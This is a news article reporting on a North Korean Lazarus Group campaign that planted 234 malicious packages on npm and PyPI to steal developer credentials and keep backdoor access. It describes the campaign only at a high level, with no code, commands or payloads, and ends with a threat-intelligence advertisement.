Lazarus Hackers Weaponized 234 Packages Across npm and PyPI to Infect Developers

A sophisticated cyber espionage campaign targeting software developers has infiltrated two of the world’s largest open source package repositories, with North Korea’s notorious Lazarus Group successfully deploying 234 malicious packages across npm and PyPI ecosystems.

Between January and July 2025, this state-sponsored operation exposed over 36,000 potential victims to advanced malware designed for long-term surveillance and credential theft.

The malicious packages masqueraded as legitimate developer tools, exploiting the inherent trust developers place in open source ecosystems.

These weaponized components functioned as espionage implants, engineered to steal sensitive secrets, profile target hosts, and establish persistent backdoors into critical infrastructure systems.

The campaign represents a strategic evolution in nation-state cyber warfare, transforming everyday development workflows into attack vectors.

Sonatype analysts identified the threat actor as the Lazarus Group, also known as Hidden Cobra, a North Korean state-sponsored collective associated with the Reconnaissance General Bureau.

This group’s decade-long criminal portfolio includes high-profile attacks such as the 2014 Sony Pictures breach, the 2016 Bangladesh Bank heist, and the devastating 2017 WannaCry ransomware outbreak.

Most recently, they orchestrated the $1.5 billion ByBit cryptocurrency theft in 2025. The attack methodology leveraged several critical vulnerabilities within open source ecosystems.

Developers routinely install packages without comprehensive verification or sandboxing protocols, while automated CI/CD systems propagate malicious dependencies throughout development pipelines without human oversight.

The decentralized nature of many popular projects, often maintained by just one or two individuals, creates opportunities for impersonation and compromise.

Persistence and Evasion Mechanisms

The Lazarus Group employed sophisticated persistence tactics centered on modular payload delivery and infrastructure evasion techniques.

Their malware utilized a multi-stage infection process, where initial package installation triggered dormant code that would activate during subsequent development activities.

The malicious components integrated seamlessly with legitimate development tools, making detection extremely challenging through conventional security scanning methods.

The persistent backdoors established by these packages created long-term access channels that remained undetected for extended periods, allowing continuous data exfiltration from compromised developer environments containing sensitive credentials, API tokens, and proprietary source code.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches